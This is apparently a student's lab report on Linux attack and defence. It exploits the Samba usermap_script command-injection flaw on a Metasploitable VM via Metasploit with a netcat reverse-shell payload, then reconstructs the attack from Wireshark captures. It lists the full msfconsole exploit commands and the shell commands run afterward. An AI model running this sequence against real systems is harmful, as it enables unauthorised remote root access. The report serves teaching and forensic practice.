当前位置: 首页 > news >正文

20251917李鑫明-实践七 Linux系统攻防

1.实践内容

(1)任务

  • 任务一:使用 Metasploit 框架对 Linux 靶机的 Samba 服务进行远程渗透。通过 usermap_script 漏洞模块,配置合适的远程 Shell 载荷,设置目标与监听参数,完成漏洞利用,最终获取靶机的主机访问权限并验证权限级别。
  • 任务二:进行攻防对抗模拟。攻击方在任务一基础上进一步取得 root 权限,并在靶机上执行命令、留下痕迹;防守方通过 Wireshark 在攻击期间实时抓包,分析流量还原攻击全过程,提取攻击者 IP、目标 IP 与端口、攻击时间、漏洞利用细节、Shellcode 类型以及攻击成功后输入的指令。

(2)实验环境

系统 IP
Kali Linux 192.168.188.13
Metasploitable-Ubuntu 192.168.188.125

(3).知识点梳理

  • Metasploit 基础:msfconsole 使用、模块加载(use)、参数配置(set)、漏洞利用(exploit)和会话管理(sessions)。
  • Samba 漏洞原理:usermap_script 命令注入漏洞(CVE-2007-2447),通过包含恶意 shell 元字符的用户名在 sh -c 中执行任意命令。
  • Payload 机制:反向 Shell(cmd/unix/reverse_netcat)利用 mkfifonc 建立反向连接并重定向 I/O。
  • 网络连通性诊断:pingnmap 检查目标可达性与端口开放状态。
  • 流量分析:tcpdump 抓包、Wireshark 过滤(tcp.portsmb)与 TCP 流追踪,从原始流量中还原攻击过程。
  • 攻击取证:从 SMB 会话请求中提取命令注入 payload,从反向连接端口的 TCP 流中恢复攻击者输入的明文命令。

二、实验过程

(1)使用Metasploit进行Linux远程渗透攻击

任务:使用Metasploit渗透测试软件,攻击Linux靶机上的Samba服务Usermap_script安全漏洞,获取目标Linux靶机的主机访问权限。实践步骤如下:

首先确认连通性
01644d32b79b194fd43229528ca444fa
①启动Metasploit软件;
719952332bfe32e749ec1ab3c1b51624
②使用exploit:exploit/multi/samba/usermap_script渗透攻击模块;

use /multi/samba/usermap_script
08e483da337be846c19347a155482950
③选择攻击PAYLOAD为远程shell,(正向或反向连接均可);
84756f84188ccfb46e69022eddc0646c
④设置渗透攻击参数(RHOST,LHOST,TARGET等);

set RHOST 192.168.188.125
set LHOST 192.168.188.13
set LPORT 4444
set payload cmd/unix/reverse_netcat
d5ded7f8704bade4184b23de7853d1e1
show options确定一下配置
0bf53471fe6d3278bdb8e62e1e502105
⑤执行渗透攻击;

exploit
sessions 1 #进入会话
执行渗透攻击后会看上去像是卡了,这是因为Metasploit 默认把拿到的 shell 放在后台,不会自动弹出交互界面,所以你看到提示后就停滞在那里。

这时执行sessions 1可以进入会话,然后正常执行命令就可以了
962f9bf4c1862e50bbda642cc7e51e47
⑥查看是否正确得到远程Shell,并查看获得的权限。

查看hostname,显示metasplotiable
33cabf8b2d429b786f38c106f63d73eb
执行whoami发现现在是root
6452d5d2afdabb526c01a5975c51320a

(2)攻防对抗实践

攻击方:使用 Metasploit ,选择 Metasploitable 靶机中发现的漏洞进行渗透攻击,获得远程控制权,并尝试进一步获得root权限。

防守方:使用 tcp dump/wireshark/snort 监听获得网络攻击的数据包文件,结合 wireshark/snort 分析攻击过程,获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

防守方开始抓包
95bafb076f5f6cdc0698854be7286689
攻击机攻击靶机
sudo msfconsole
use /multi/samba/usermap_script
set RHOST 192.168.188.125
set LHOST 192.168.188.13
set LPORT 4444
set payload cmd/unix/reverse_netcat
exploit
sessions 1
6db5269c9335ef4c8f31eafacaa96f30
依次执行了
whoami
ls
echo "HACKED by Kali 2025.4"
防守方结束抓包

流量分析

确定攻击参与方
通过 ip.addr == 192.168.188.125 过滤,发现攻击源 IP 为 192.168.188.13,目标 IP 为 192.168.188.125。

定位漏洞利用阶段
使用显示过滤器 tcp.port == 139 or tcp.port == 445 查看 SMB 流量,可观察到 Samba 会话建立及 NetBIOS 交互。
15272bde0a053dc3e55475f4f03371bc
通过追踪编号对应的 TCP 流,发现数据流中出现畸形用户名参数:/= 或 ; 等注入符号
d0c12a958c6096f9b42aabe82e38eda2
搜索得出这正是 usermap_script 漏洞利用的核心手法——借助 Samba 对用户名映射脚本处理不当的缺陷,在用户名中注入恶意指令,从而在靶机成功触发反向 shell。

攻击发起时间
在 Wireshark 中找到第一个包含畸形用户名的 SMB 请求包,查看其时间戳,获得精确的攻击起始时间1396410dadad4b73e7c5c69c624cfea0

成功后命令记录
从反向 Shell 的 TCP 流中可直接提取攻击者输入的命令串
a26cb96505b00c61e8f766b364863e57
通过上述分析,防守方成功还原了完整的攻击链,获得了攻击者 IP、目标 IP 与端口、攻击发起时间、利用漏洞、载荷类型以及攻击成功后执行的全部命令。

三.学习中遇到的问题及解决

  • 问题:在使用 bind_netcat 载荷时,exploit 显示成功但始终无法建立到 4444 端口的连接,返回超时。
  • 解决方案:排查发现 Metasploitable 靶机的防火墙 ufw 处于开启状态,阻止了外部对非服务端口的访问。在靶机执行 sudo ufw disable 临时关闭防火墙后再次攻击,成功获得 shell。实验后记得重新打开防火墙以保持环境安全。

四.实践总结

通过这次实践,我熟练掌握了使用 Metasploit 对 Linux 平台 Samba 服务漏洞进行攻击的整个流程,以及如何利用 Wireshark 对攻击流量进行完整取证分析。攻与防相互印证,加深了我对网络安全技术内里逻辑的理解。

http://www.jsqmd.com/news/785441/

相关文章:

  • AEC行业AI与机器人伦理挑战:安全、公平与治理框架
  • Redis学习5 分布式缓存(下)
  • 深度学习在眼科AI诊断中的应用:从模型构建到临床落地
  • KITTI不够用?深度评测ORFD:这个专为越野打造的免费数据集到底香不香
  • meituan mtgsig1.2
  • CANN/pyasc架构介绍
  • cann/sip asdConvolve卷积滤波算子
  • 2026 年鼓楼区 GEO 优化公司深度测评:南京赢之乐凭本土深耕与合规技术领跑 - 小艾信息发布
  • AI智能体技能开发实战:从黄历查询看垂直领域知识封装
  • 多模态机器学习:从融合范式到MULTIBENCH基准实践
  • 3篇3章8节:Obsidian 的全方位写作工作流
  • 解锁私人游戏云:用Sunshine打造专属游戏串流服务器
  • AI数据污染与模型退化:扩散模型自训练实验揭示反馈循环风险
  • 顶会论文模块复现与二次创新:ICLR 2026 复现:状态空间模型 Vim 模块在视觉检测中的高效替代与 YOLO 集成
  • 2026年5月武汉殡葬机构靠谱服务商深度测评攻略 - 海棠依旧大
  • 鄂尔多斯地磅配件采购指南:本地标杆厂家与高性价比定制方案推荐 - 品牌策略师
  • 从FOLD规则到反事实解释:构建可信AI系统的核心技术路径
  • CANN/HCCL集合通信库快速入门指南
  • 芯片设计实战:变异感知设计方法论与先进工艺下的良率挑战
  • 扩散模型原理与实践:从噪声预测到图像生成的AI核心技术
  • cann/ops-math矩阵乘压缩解压缩算子
  • 《龙虾OpenClaw系列:从嵌入式裸机到芯片级系统深度实战60课》038、多核架构入门——双核通信与共享内存
  • AI赋能分子相互作用:几何深度学习在药物与材料设计中的实践
  • 保姆级教程:用Tinc在Ubuntu 22.04上搭建一个加密的虚拟局域网(附多节点配置避坑指南)
  • UIKit开发者的桌面助手:生命周期、内存、并发与集合视图实践指南
  • 《网络攻防实践》实践八报告
  • 告别‘黑盒子’:用一台标准服务器搞定防火墙、路由和DHCP,聊聊NFV在家庭和企业网关的实战应用
  • XHS-Downloader:专业级小红书内容采集与批量下载技术方案
  • Rust轻量级LLM推理框架graniet/llm:本地部署与高性能实践
  • 4.30 redis简介